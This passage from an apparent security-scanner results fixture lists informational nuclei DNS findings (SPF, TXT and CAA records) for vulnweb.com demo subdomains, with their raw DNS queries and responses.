"http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:36.627Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 19184\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 19184\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 34, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:36.794Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 62565\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 62565\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 35, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:36.913Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 62565\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 62565\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 36, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 68, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://rest.vulnweb.com", + "discovered_date": "2024-11-13T02:34:37.006Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 17907\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 17907\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 37, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 68, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://rest.vulnweb.com", + "discovered_date": "2024-11-13T02:34:37.129Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 43181\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 43181\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 38, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 68, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://rest.vulnweb.com", + "discovered_date": "2024-11-13T02:34:37.253Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 61794\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 61794\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 39, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 68, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://rest.vulnweb.com", + "discovered_date": "2024-11-13T02:34:37.348Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 12679\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 12679\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 40, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 68, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://rest.vulnweb.com", + "discovered_date": "2024-11-13T02:34:37.465Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 61414\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 61414\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 41, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 68, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://rest.vulnweb.com", + "discovered_date": "2024-11-13T02:34:37.572Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 9522\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 9522\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 42, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 68, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://rest.vulnweb.com", + "discovered_date": "2024-11-13T02:34:37.674Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 42935\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 42935\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 43, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:37.764Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 42944\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 42944\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 44, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:37.844Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 52624\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 52624\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 45, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 68, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://rest.vulnweb.com", + "discovered_date": "2024-11-13T02:34:37.915Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 6216\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 6216\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;rest.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 46, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:38.000Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 18158\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 18158\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 47, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:38.080Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 49744\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 49744\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 48, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:38.173Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 58962\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 58962\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 49, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:34:38.277Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 55638\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testaspnet.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 55638\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testaspnet.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 50, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": 